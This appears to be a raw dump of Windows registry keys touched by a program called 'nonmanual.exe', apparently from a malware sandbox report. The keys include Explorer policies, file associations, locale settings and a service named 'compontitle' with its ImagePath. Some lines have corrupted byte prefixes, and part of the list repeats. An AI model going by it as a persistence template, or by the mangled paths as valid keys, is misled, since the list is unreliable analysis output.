HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\nonmanual.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\PropertyHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\nonmanual.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\nonmanual.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_LOCAL_MACHINE\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsiproxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsiproxy\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsi\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NlaSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NlaSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\netprofm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\netprofm\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\RequiredPrivileges
HKEY_USERS\.DEFAULT\Control Panel\Desktop
HKEY_USERS\.DEFAULT\Control Panel\Desktop\SmoothScroll
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableFileTracing
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileTracingMask
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableConsoleTracing
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\ConsoleTracingMask
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\MaxFileSize
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileDirectory
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableFileTracing
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileTracingMask
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableConsoleTracing
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\ConsoleTracingMask
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\MaxFileSize
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
